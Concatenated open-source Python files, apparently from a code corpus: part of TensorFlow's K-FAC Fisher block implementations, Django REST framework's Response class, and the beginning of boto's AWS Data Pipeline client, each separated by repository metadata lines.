self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.NaiveDiagonalFactor, (grads_list, self._batch_size))
def multiply_inverse(self, vector):
vector_flat = utils.tensors_to_column(vector)
out_flat = vector_flat / (self._factor.get_cov() + self._damping)
return utils.column_to_tensors(vector, out_flat)
def multiply(self, vector):
vector_flat = utils.tensors_to_column(vector)
out_flat = vector_flat * (self._factor.get_cov() + self._damping)
return utils.column_to_tensors(vector, out_flat)
def full_fisher_block(self):
return array_ops.diag(array_ops.reshape(self._factor.get_cov(), (-1,)))
def tensors_to_compute_grads(self):
return self._params
def register_additional_minibatch(self, batch_size):
"""Register an additional minibatch.
Args:
batch_size: The batch size, used in the covariance estimator.
"""
self._batch_sizes.append(batch_size)
@property
def num_registered_minibatches(self):
return len(self._batch_sizes)
@property
def _batch_size(self):
return math_ops.reduce_sum(self._batch_sizes)
class FullyConnectedDiagonalFB(FisherBlock):
"""FisherBlock for fully-connected (dense) layers using a diagonal approx.
Estimates the Fisher Information matrix's diagonal entries for a fully
connected layer. Unlike NaiveDiagonalFB this uses the low-variance "sum of
squares" estimator.
Let 'params' be a vector parameterizing a model and 'i' an arbitrary index
into it. We are interested in Fisher(params)[i, i]. This is,
Fisher(params)[i, i] = E[ v(x, y, params) v(x, y, params)^T ][i, i]
= E[ v(x, y, params)[i] ^ 2 ]
Consider fully connected layer in this model with (unshared) weight matrix
'w'. For an example 'x' that produces layer inputs 'a' and output
preactivations 's',
v(x, y, w) = vec( a (d loss / d s)^T )
This FisherBlock tracks Fisher(params)[i, i] for all indices 'i' corresponding
to the layer's parameters 'w'.
"""
def __init__(self, layer_collection, has_bias=False):
"""Creates a FullyConnectedDiagonalFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
has_bias: Whether the component Kronecker factors have an additive bias.
(Default: False)
"""
self._inputs = []
self._outputs = []
self._has_bias = has_bias
super(FullyConnectedDiagonalFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedDiagonalFactor,
(inputs, grads_list, self._has_bias))
def multiply_inverse(self, vector):
"""Approximate damped inverse Fisher-vector product.
Args:
vector: Tensor or 2-tuple of Tensors. if self._has_bias, Tensor of shape
[input_size, output_size] corresponding to layer's weights. If not, a
2-tuple of the former and a Tensor of shape [output_size] corresponding
to the layer's bias.
Returns:
Tensor of the same shape, corresponding to the inverse Fisher-vector
product.
"""
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect / (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def multiply(self, vector):
"""Approximate damped Fisher-vector product.
Args:
vector: Tensor or 2-tuple of Tensors. if self._has_bias, Tensor of shape
[input_size, output_size] corresponding to layer's weights. If not, a
2-tuple of the former and a Tensor of shape [output_size] corresponding
to the layer's bias.
Returns:
Tensor of the same shape, corresponding to the Fisher-vector product.
"""
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect * (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def tensors_to_compute_grads(self):
"""Tensors to compute derivative of loss with respect to."""
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, input_size]. Inputs to the
matrix-multiply.
outputs: Tensor of shape [batch_size, output_size]. Layer preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
result = len(self._inputs)
assert result == len(self._outputs)
return result
class ConvDiagonalFB(FisherBlock):
"""FisherBlock for convolutional layers using a diagonal approx.
Estimates the Fisher Information matrix's diagonal entries for a convolutional
layer. Unlike NaiveDiagonalFB this uses the low-variance "sum of squares"
estimator.
Let 'params' be a vector parameterizing a model and 'i' an arbitrary index
into it. We are interested in Fisher(params)[i, i]. This is,
Fisher(params)[i, i] = E[ v(x, y, params) v(x, y, params)^T ][i, i]
= E[ v(x, y, params)[i] ^ 2 ]
Consider a convoluational layer in this model with (unshared) filter matrix
'w'. For an example image 'x' that produces layer inputs 'a' and output
preactivations 's',
v(x, y, w) = vec( sum_{loc} a_{loc} (d loss / d s_{loc})^T )
where 'loc' is a single (x, y) location in an image.
This FisherBlock tracks Fisher(params)[i, i] for all indices 'i' corresponding
to the layer's parameters 'w'.
"""
def __init__(self, layer_collection, params, strides, padding):
"""Creates a ConvDiagonalFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters (Tensor or tuple of Tensors) of this layer. If
kernel alone, a Tensor of shape [kernel_height, kernel_width,
in_channels, out_channels]. If kernel and bias, a tuple of 2 elements
containing the previous and a Tensor of shape [out_channels].
strides: The stride size in this layer (1-D Tensor of length 4).
padding: The padding in this layer (e.g. "SAME").
"""
self._inputs = []
self._outputs = []
self._strides = tuple(strides) if isinstance(strides, list) else strides
self._padding = padding
self._has_bias = isinstance(params, (tuple, list))
fltr = params[0] if self._has_bias else params
self._filter_shape = tuple(fltr.shape.as_list())
super(ConvDiagonalFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
# Concatenate inputs, grads_list into single Tensors.
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
# Infer number of locations upon which convolution is applied.
inputs_shape = tuple(inputs.shape.as_list())
self._num_locations = (
inputs_shape[1] * inputs_shape[2] //
(self._strides[1] * self._strides[2]))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_locations**NORMALIZE_DAMPING_POWER
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.ConvDiagonalFactor,
(inputs, grads_list, self._filter_shape, self._strides, self._padding,
self._has_bias))
def multiply_inverse(self, vector):
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect / (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def multiply(self, vector):
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect * (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def tensors_to_compute_grads(self):
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, height, width, input_size]. Inputs to
the convolution.
outputs: Tensor of shape [batch_size, height, width, output_size]. Layer
preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
return len(self._inputs)
class KroneckerProductFB(FisherBlock):
"""A base class for FisherBlocks with separate input and output factors.
The Fisher block is approximated as a Kronecker product of the input and
output factors.
"""
def _register_damped_input_and_output_inverses(self, damping):
"""Registers damped inverses for both the input and output factors.
Sets the instance members _input_damping and _output_damping. Requires the
instance members _input_factor and _output_factor.
Args:
damping: The base damping factor (float or Tensor) for the damped inverse.
"""
self._input_damping, self._output_damping = _compute_pi_adjusted_damping(
self._input_factor.get_cov(),
self._output_factor.get_cov(),
damping**0.5)
self._input_factor.register_damped_inverse(self._input_damping)
self._output_factor.register_damped_inverse(self._output_damping)
@property
def _renorm_coeff(self):
"""Kronecker factor multiplier coefficient.
If this FisherBlock is represented as 'FB = c * kron(left, right)', then
this is 'c'.
Returns:
0-D Tensor.
"""
return 1.0
def multiply_inverse(self, vector):
left_factor_inv = self._input_factor.get_damped_inverse(self._input_damping)
right_factor_inv = self._output_factor.get_damped_inverse(
self._output_damping)
reshaped_vector = utils.layer_params_to_mat2d(vector)
reshaped_out = math_ops.matmul(left_factor_inv,
math_ops.matmul(reshaped_vector,
right_factor_inv))
if self._renorm_coeff != 1.0:
reshaped_out /= math_ops.cast(
self._renorm_coeff, dtype=reshaped_out.dtype)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def multiply(self, vector):
left_factor = self._input_factor.get_cov()
right_factor = self._output_factor.get_cov()
reshaped_vector = utils.layer_params_to_mat2d(vector)
reshaped_out = (
math_ops.matmul(reshaped_vector, right_factor) +
self._output_damping * reshaped_vector)
reshaped_out = (
math_ops.matmul(left_factor, reshaped_out) +
self._input_damping * reshaped_out)
if self._renorm_coeff != 1.0:
reshaped_out *= math_ops.cast(
self._renorm_coeff, dtype=reshaped_out.dtype)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def full_fisher_block(self):
"""Explicitly constructs the full Fisher block.
Used for testing purposes. (In general, the result may be very large.)
Returns:
The full Fisher block.
"""
left_factor = self._input_factor.get_cov()
right_factor = self._output_factor.get_cov()
return self._renorm_coeff * utils.kronecker_product(left_factor,
right_factor)
class FullyConnectedKFACBasicFB(KroneckerProductFB):
"""K-FAC FisherBlock for fully-connected (dense) layers.
This uses the Kronecker-factorized approximation from the original
K-FAC paper (https://arxiv.org/abs/1503.05671)
"""
def __init__(self, layer_collection, has_bias=False):
"""Creates a FullyConnectedKFACBasicFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
has_bias: Whether the component Kronecker factors have an additive bias.
(Default: False)
"""
self._inputs = []
self._outputs = []
self._has_bias = has_bias
super(FullyConnectedKFACBasicFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
"""Instantiate Kronecker Factors for this FisherBlock.
Args:
grads_list: List of list of Tensors. grads_list[i][j] is the
gradient of the loss with respect to 'outputs' from source 'i' and
tower 'j'. Each Tensor has shape [tower_minibatch_size, output_size].
damping: 0-D Tensor or float. 'damping' * identity is approximately added
to this FisherBlock's Fisher approximation.
"""
# TODO(b/68033310): Validate which of,
# (1) summing on a single device (as below), or
# (2) on each device in isolation and aggregating
# is faster.
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
self._input_factor = self._layer_collection.make_or_get_factor( #
fisher_factors.FullyConnectedKroneckerFactor, #
((inputs,), self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor( #
fisher_factors.FullyConnectedKroneckerFactor, #
(grads_list,))
self._register_damped_input_and_output_inverses(damping)
def tensors_to_compute_grads(self):
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, input_size]. Inputs to the
matrix-multiply.
outputs: Tensor of shape [batch_size, output_size]. Layer preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
return len(self._inputs)
class ConvKFCBasicFB(KroneckerProductFB):
"""FisherBlock for 2D convolutional layers using the basic KFC approx.
Estimates the Fisher Information matrix's blog for a convolutional
layer.
Consider a convoluational layer in this model with (unshared) filter matrix
'w'. For a minibatch that produces inputs 'a' and output preactivations 's',
this FisherBlock estimates,
F(w) = #locations * kronecker(E[flat(a) flat(a)^T],
E[flat(ds) flat(ds)^T])
where
ds = (d / ds) log p(y | x, w)
#locations = number of (x, y) locations where 'w' is applied.
where the expectation is taken over all examples and locations and flat()
concatenates an array's leading dimensions.
See equation 23 in https://arxiv.org/abs/1602.01407 for details.
"""
def __init__(self, layer_collection, params, strides, padding):
"""Creates a ConvKFCBasicFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters (Tensor or tuple of Tensors) of this layer. If
kernel alone, a Tensor of shape [kernel_height, kernel_width,
in_channels, out_channels]. If kernel and bias, a tuple of 2 elements
containing the previous and a Tensor of shape [out_channels].
strides: The stride size in this layer (1-D Tensor of length 4).
padding: The padding in this layer (1-D of Tensor length 4).
"""
self._inputs = []
self._outputs = []
self._strides = tuple(strides) if isinstance(strides, list) else strides
self._padding = padding
self._has_bias = isinstance(params, (tuple, list))
fltr = params[0] if self._has_bias else params
self._filter_shape = tuple(fltr.shape.as_list())
super(ConvKFCBasicFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
# TODO(b/68033310): Validate which of,
# (1) summing on a single device (as below), or
# (2) on each device in isolation and aggregating
# is faster.
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
# Infer number of locations upon which convolution is applied.
self._num_locations = _num_conv_locations(inputs.shape.as_list(),
self._strides)
self._input_factor = self._layer_collection.make_or_get_factor(
fisher_factors.ConvInputKroneckerFactor,
(inputs, self._filter_shape, self._strides, self._padding,
self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor(
fisher_factors.ConvOutputKroneckerFactor, (grads_list,))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_locations**NORMALIZE_DAMPING_POWER
self._damping = damping
self._register_damped_input_and_output_inverses(damping)
@property
def _renorm_coeff(self):
return self._num_locations
def tensors_to_compute_grads(self):
return self._outputs
def register_additional_minibatch(self, inputs, outputs):
"""Registers an additional minibatch to the FisherBlock.
Args:
inputs: Tensor of shape [batch_size, height, width, input_size]. Inputs to
the convolution.
outputs: Tensor of shape [batch_size, height, width, output_size]. Layer
preactivations.
"""
self._inputs.append(inputs)
self._outputs.append(outputs)
@property
def num_registered_minibatches(self):
return len(self._inputs)
def _concat_along_batch_dim(tensor_list):
"""Concatenate tensors along batch (first) dimension.
Args:
tensor_list: list of Tensors or list of tuples of Tensors.
Returns:
Tensor or tuple of Tensors.
Raises:
ValueError: If 'tensor_list' is empty.
"""
if not tensor_list:
raise ValueError(
"Cannot concatenate Tensors if there are no Tensors to concatenate.")
if isinstance(tensor_list[0], (tuple, list)):
# [(tensor1a, tensor1b),
# (tensor2a, tensor2b), ...] --> (tensor_a, tensor_b)
return tuple(
array_ops.concat(tensors, axis=0) for tensors in zip(*tensor_list))
else:
# [tensor1, tensor2] --> tensor
return array_ops.concat(tensor_list, axis=0)
def _num_conv_locations(input_shape, strides):
"""Returns the number of locations a Conv kernel is applied to."""
return input_shape[1] * input_shape[2] // (strides[1] * strides[2])
class FullyConnectedMultiIndepFB(KroneckerProductFB):
"""FisherBlock for fully-connected layers that share parameters.
"""
def __init__(self, layer_collection, inputs, outputs, has_bias=False):
"""Creates a FullyConnectedMultiIndepFB block.
Args:
layer_collection: LayerCollection instance.
inputs: list or tuple of Tensors. Each Tensor has shape [batch_size,
inputs_size].
outputs: list or tuple of Tensors. Each Tensor has shape [batch_size,
outputs_size].
has_bias: bool. If True, estimates Fisher with respect to a bias
parameter as well as the layer's parameters.
"""
assert len(inputs) == len(outputs)
# We need to make sure inputs and outputs are tuples and not lists so that
# they get hashed by layer_collection.make_or_get_factor properly.
self._inputs = tuple(inputs)
self._outputs = tuple(outputs)
self._has_bias = has_bias
self._num_uses = len(inputs)
super(FullyConnectedMultiIndepFB, self).__init__(layer_collection)
@property
def num_registered_minibatches(self):
# TODO(b/69411207): Add support for registering additional minibatches.
return 1
def instantiate_factors(self, grads_list, damping):
self._input_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF,
((self._inputs,), self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF, (grads_list,))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_uses**NORMALIZE_DAMPING_POWER
self._register_damped_input_and_output_inverses(damping)
@property
def _renorm_coeff(self):
return self._num_uses
def tensors_to_compute_grads(self):
return self._outputs
def num_inputs(self):
return len(self._inputs)
class SeriesFBApproximation(enum.IntEnum):
"""See FullyConnectedSeriesFB.__init__ for description and usage."""
option1 = 1
option2 = 2
class FullyConnectedSeriesFB(FisherBlock):
"""FisherBlock for fully-connected layers that share parameters across time.
See the following preprint for details:
https://openreview.net/pdf?id=HyMTkQZAb
See the end of the appendix of the paper for a pseudo-code of the
algorithm being implemented by multiply_inverse here. Note that we are
using pre-computed versions of certain matrix-matrix products to speed
things up. This is explicitly explained wherever it is done.
"""
def __init__(self,
layer_collection,
inputs,
outputs,
has_bias=False,
option=SeriesFBApproximation.option2):
"""Constructs a new `FullyConnectedSeriesFB`.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
inputs: List of tensors of shape [batch_size, input_size].
Inputs to the layer.
outputs: List of tensors of shape [batch_size, input_size].
Outputs of the layer (before activations).
has_bias: Whether the layer includes a bias parameter.
option: A `SeriesFBApproximation` specifying the simplifying assumption
to be used in this block. `option1` approximates the cross-covariance
over time as a symmetric matrix, while `option2` makes
the assumption that training sequences are infinitely long. See section
3.5 of the paper for more details.
"""
assert len(inputs) == len(outputs)
# We need to make sure inputs and outputs are tuples and not lists so that
# they get hashed by layer_collection.make_or_get_factor properly.
self._inputs = tuple(inputs)
self._outputs = tuple(outputs)
self._has_bias = has_bias
self._num_timesteps = len(inputs)
self._option = option
super(FullyConnectedSeriesFB, self).__init__(layer_collection)
@property
def num_registered_minibatches(self):
# TODO(b/69411207): Add support for registering additional minibatches.
return 1
def instantiate_factors(self, grads_list, damping):
self._input_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF, ((self._inputs,), self._has_bias))
self._output_factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedMultiKF, (grads_list,))
if NORMALIZE_DAMPING_POWER:
damping /= self._num_timesteps**NORMALIZE_DAMPING_POWER
self._damping_input, self._damping_output = _compute_pi_adjusted_damping(
self._input_factor.get_cov(),
self._output_factor.get_cov(),
damping**0.5)
if self._option == SeriesFBApproximation.option1:
self._input_factor.register_option1quants(self._damping_input)
self._output_factor.register_option1quants(self._damping_output)
elif self._option == SeriesFBApproximation.option2:
self._input_factor.register_option2quants(self._damping_input)
self._output_factor.register_option2quants(self._damping_output)
else:
raise ValueError(
"Unrecognized FullyConnectedSeriesFB approximation: {}".format(
self._option))
def multiply_inverse(self, vector):
# pylint: disable=invalid-name
Z = utils.layer_params_to_mat2d(vector)
# Derivations were done for "batch_dim==1" case so we need to convert to
# that orientation:
Z = array_ops.transpose(Z)
if self._option == SeriesFBApproximation.option1:
# Note that L_A = A0^(-1/2) * U_A and L_G = G0^(-1/2) * U_G.
L_A, psi_A = self._input_factor.get_option1quants(self._damping_input)
L_G, psi_G = self._output_factor.get_option1quants(self._damping_output)
def gamma(x):
# We are assuming that each case has the same number of time-steps.
# If this stops being the case one shouldn't simply replace this T
# with its average value. Instead, one needs to go back to the
# definition of the gamma function from the paper.
T = self._num_timesteps
return (1 - x)**2 / (T * (1 - x**2) - 2 * x * (1 - x**T))
# Y = gamma( psi_G*psi_A^T ) (computed element-wise)
# Even though Y is Z-independent we are recomputing it from the psi's
# each since Y depends on both A and G quantities, and it is relatively
# cheap to compute.
Y = gamma(array_ops.reshape(psi_G, [int(psi_G.shape[0]), -1]) * psi_A)
# Z = L_G^T * Z * L_A
# This is equivalent to the following computation from the original
# pseudo-code:
# Z = G0^(-1/2) * Z * A0^(-1/2)
# Z = U_G^T * Z * U_A
Z = math_ops.matmul(L_G, math_ops.matmul(Z, L_A), transpose_a=True)
# Z = Z .* Y
Z *= Y
# Z = L_G * Z * L_A^T
# This is equivalent to the following computation from the original
# pseudo-code:
# Z = U_G * Z * U_A^T
# Z = G0^(-1/2) * Z * A0^(-1/2)
Z = math_ops.matmul(L_G, math_ops.matmul(Z, L_A, transpose_b=True))
elif self._option == SeriesFBApproximation.option2:
# Note that P_A = A_1^T * A_0^(-1) and P_G = G_1^T * G_0^(-1),
# and K_A = A_0^(-1/2) * E_A and K_G = G_0^(-1/2) * E_G.
P_A, K_A, mu_A = self._input_factor.get_option2quants(self._damping_input)
P_G, K_G, mu_G = self._output_factor.get_option2quants(
self._damping_output)
# Our approach differs superficially from the pseudo-code in the paper
# in order to reduce the total number of matrix-matrix multiplies.
# In particular, the first three computations in the pseudo code are
# Z = G0^(-1/2) * Z * A0^(-1/2)
# Z = Z - hPsi_G^T * Z * hPsi_A
# Z = E_G^T * Z * E_A
# Noting that hPsi = C0^(-1/2) * C1 * C0^(-1/2), so that
# C0^(-1/2) * hPsi = C0^(-1) * C1 * C0^(-1/2) = P^T * C0^(-1/2)
# the entire computation can be written as
# Z = E_G^T * (G0^(-1/2) * Z * A0^(-1/2)
# - hPsi_G^T * G0^(-1/2) * Z * A0^(-1/2) * hPsi_A) * E_A
# = E_G^T * (G0^(-1/2) * Z * A0^(-1/2)
# - G0^(-1/2) * P_G * Z * P_A^T * A0^(-1/2)) * E_A
# = E_G^T * G0^(-1/2) * Z * A0^(-1/2) * E_A
# - E_G^T* G0^(-1/2) * P_G * Z * P_A^T * A0^(-1/2) * E_A
# = K_G^T * Z * K_A - K_G^T * P_G * Z * P_A^T * K_A
# This final expression is computed by the following two lines:
# Z = Z - P_G * Z * P_A^T
Z -= math_ops.matmul(P_G, math_ops.matmul(Z, P_A, transpose_b=True))
# Z = K_G^T * Z * K_A
Z = math_ops.matmul(K_G, math_ops.matmul(Z, K_A), transpose_a=True)
# Z = Z ./ (1*1^T - mu_G*mu_A^T)
# Be careful with the outer product. We don't want to accidentally
# make it an inner-product instead.
tmp = 1.0 - array_ops.reshape(mu_G, [int(mu_G.shape[0]), -1]) * mu_A
# Prevent some numerical issues by setting any 0.0 eigs to 1.0
tmp += 1.0 * math_ops.cast(math_ops.equal(tmp, 0.0), dtype=tmp.dtype)
Z /= tmp
# We now perform the transpose/reverse version of the operations
# derived above, whose derivation from the original pseudo-code is
# analgous.
# Z = K_G * Z * K_A^T
Z = math_ops.matmul(K_G, math_ops.matmul(Z, K_A, transpose_b=True))
# Z = Z - P_G^T * Z * P_A
Z -= math_ops.matmul(P_G, math_ops.matmul(Z, P_A), transpose_a=True)
# Z = normalize (1/E[T]) * Z
# Note that this normalization is done because we compute the statistics
# by averaging, not summing, over time. (And the gradient is presumably
# summed over time, not averaged, and thus their scales are different.)
Z /= math_ops.cast(self._num_timesteps, Z.dtype)
# Convert back to the "batch_dim==0" orientation.
Z = array_ops.transpose(Z)
return utils.mat2d_to_layer_params(vector, Z)
# pylint: enable=invalid-name
def multiply(self, vector):
raise NotImplementedError
def tensors_to_compute_grads(self):
return self._outputs
def num_inputs(self):
return len(self._inputs)
| apache-2.0 |
agconti/njode | env/lib/python2.7/site-packages/rest_framework/response.py | 5 | 3150 | """
The Response class in REST framework is similar to HTTPResponse, except that
it is initialized with unrendered data, instead of a pre-rendered string.
The appropriate renderer is called during Django's template response rendering.
"""
from __future__ import unicode_literals
from django.core.handlers.wsgi import STATUS_CODE_TEXT
from django.template.response import SimpleTemplateResponse
from django.utils import six
class Response(SimpleTemplateResponse):
"""
An HttpResponse that allows its data to be rendered into
arbitrary media types.
"""
def __init__(self, data=None, status=None,
template_name=None, headers=None,
exception=False, content_type=None):
"""
Alters the init arguments slightly.
For example, drop 'template_name', and instead use 'data'.
Setting 'renderer' and 'media_type' will typically be deferred,
For example being set automatically by the `APIView`.
"""
super(Response, self).__init__(None, status=status)
self.data = data
self.template_name = template_name
self.exception = exception
self.content_type = content_type
if headers:
for name, value in six.iteritems(headers):
self[name] = value
@property
def rendered_content(self):
renderer = getattr(self, 'accepted_renderer', None)
media_type = getattr(self, 'accepted_media_type', None)
context = getattr(self, 'renderer_context', None)
assert renderer, ".accepted_renderer not set on Response"
assert media_type, ".accepted_media_type not set on Response"
assert context, ".renderer_context not set on Response"
context['response'] = self
charset = renderer.charset
content_type = self.content_type
if content_type is None and charset is not None:
content_type = "{0}; charset={1}".format(media_type, charset)
elif content_type is None:
content_type = media_type
self['Content-Type'] = content_type
ret = renderer.render(self.data, media_type, context)
if isinstance(ret, six.text_type):
assert charset, (
'renderer returned unicode, and did not specify '
'a charset value.'
)
return bytes(ret.encode(charset))
if not ret:
del self['Content-Type']
return ret
@property
def status_text(self):
"""
Returns reason text corresponding to our HTTP response status code.
Provided for convenience.
"""
# TODO: Deprecate and use a template tag instead
# TODO: Status code text for RFC 6585 status codes
return STATUS_CODE_TEXT.get(self.status_code, '')
def __getstate__(self):
"""
Remove attributes from the response that shouldn't be cached
"""
state = super(Response, self).__getstate__()
for key in ('accepted_renderer', 'renderer_context', 'data'):
if key in state:
del state[key]
return state
| bsd-3-clause |
pymedusa/Medusa | ext/boto/datapipeline/layer1.py | 148 | 29022 | # Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
from boto.compat import json
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
from boto.exception import JSONResponseError
from boto.datapipeline import exceptions
class DataPipelineConnection(AWSQueryConnection):
"""
This is the AWS Data Pipeline API Reference . This guide provides
descriptions and samples of the AWS Data Pipeline API.
AWS Data Pipeline is a web service that configures and manages a
data-driven workflow called a pipeline. AWS Data Pipeline handles
the details of scheduling and ensuring that data dependencies are
met so your application can focus on processing the data.
The AWS Data Pipeline API implements two main sets of
functionality. The first set of actions configure the pipeline in
the web service. You call these actions to create a pipeline and
define data sources, schedules, dependencies, and the transforms
to be performed on the data.
The second set of actions are used by a task runner application
that calls the AWS Data Pipeline API to receive the next task
ready for processing. The logic for performing the task, such as
querying the data, running data analysis, or converting the data
from one format to another, is contained within the task runner.
The task runner performs the task assigned to it by the web
service, reporting progress to the web service as it does so. When
the task is done, the task runner reports the final success or
failure of the task to the web service.
AWS Data Pipeline provides an open-source implementation of a task
runner called AWS Data Pipeline Task Runner. AWS Data Pipeline
Task Runner provides logic for common data management scenarios,
such as performing database queries and running data analysis
using Amazon Elastic MapReduce (Amazon EMR). You can use AWS Data
Pipeline Task Runner as your task runner, or you can write your
own task runner to provide custom data management.
The AWS Data Pipeline API uses the Signature Version 4 protocol
for signing requests. For more information about how to sign a
request with this protocol, see `Signature Version 4 Signing
Process`_. In the code examples in this reference, the Signature
Version 4 Request parameters are represented as AuthParams.
"""
APIVersion = "2012-10-29"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "datapipeline.us-east-1.amazonaws.com"
ServiceName = "DataPipeline"
TargetPrefix = "DataPipeline"
ResponseError = JSONResponseError
_faults = {
"PipelineDeletedException": exceptions.PipelineDeletedException,
"InvalidRequestException": exceptions.InvalidRequestException,
"TaskNotFoundException": exceptions.TaskNotFoundException,
"PipelineNotFoundException": exceptions.PipelineNotFoundException,
"InternalServiceError": exceptions.InternalServiceError,
}
def __init__(self, **kwargs):
region = kwargs.pop('region', None)
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
kwargs['host'] = region.endpoint
super(DataPipelineConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def activate_pipeline(self, pipeline_id):
"""
Validates a pipeline and initiates processing. If the pipeline
does not pass validation, activation fails.
Call this action to start processing pipeline tasks of a
pipeline you've created using the CreatePipeline and
PutPipelineDefinition actions. A pipeline cannot be modified
after it has been successfully activated.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline to activate.
"""
params = {'pipelineId': pipeline_id, }
return self.make_request(action='ActivatePipeline',
body=json.dumps(params))
def create_pipeline(self, name, unique_id, description=None):
"""
Creates a new empty pipeline. When this action succeeds, you
can then use the PutPipelineDefinition action to populate the
pipeline.
:type name: string
:param name: The name of the new pipeline. You can use the same name
for multiple pipelines associated with your AWS account, because
AWS Data Pipeline assigns each new pipeline a unique pipeline
identifier.
:type unique_id: string
:param unique_id: A unique identifier that you specify. This identifier
is not the same as the pipeline identifier assigned by AWS Data
Pipeline. You are responsible for defining the format and ensuring
the uniqueness of this identifier. You use this parameter to ensure
idempotency during repeated calls to CreatePipeline. For example,
if the first call to CreatePipeline does not return a clear
success, you can pass in the same unique identifier and pipeline
name combination on a subsequent call to CreatePipeline.
CreatePipeline ensures that if a pipeline already exists with the
same name and unique identifier, a new pipeline will not be
created. Instead, you'll receive the pipeline identifier from the
previous attempt. The uniqueness of the name and unique identifier
combination is scoped to the AWS account or IAM user credentials.
:type description: string
:param description: The description of the new pipeline.
"""
params = {'name': name, 'uniqueId': unique_id, }
if description is not None:
params['description'] = description
return self.make_request(action='CreatePipeline',
body=json.dumps(params))
def delete_pipeline(self, pipeline_id):
"""
Permanently deletes a pipeline, its pipeline definition and
its run history. You cannot query or restore a deleted
pipeline. AWS Data Pipeline will attempt to cancel instances
associated with the pipeline that are currently being
processed by task runners. Deleting a pipeline cannot be
undone.
To temporarily pause a pipeline instead of deleting it, call
SetStatus with the status set to Pause on individual
components. Components that are paused by SetStatus can be
resumed.
:type pipeline_id: string
:param pipeline_id: The identifier of the pipeline to be deleted.
"""
params = {'pipelineId': pipeline_id, }
return self.make_request(action='DeletePipeline',
body=json.dumps(params))
def describe_objects(self, object_ids, pipeline_id, marker=None,
evaluate_expressions=None):
"""
Returns the object definitions for a set of objects associated
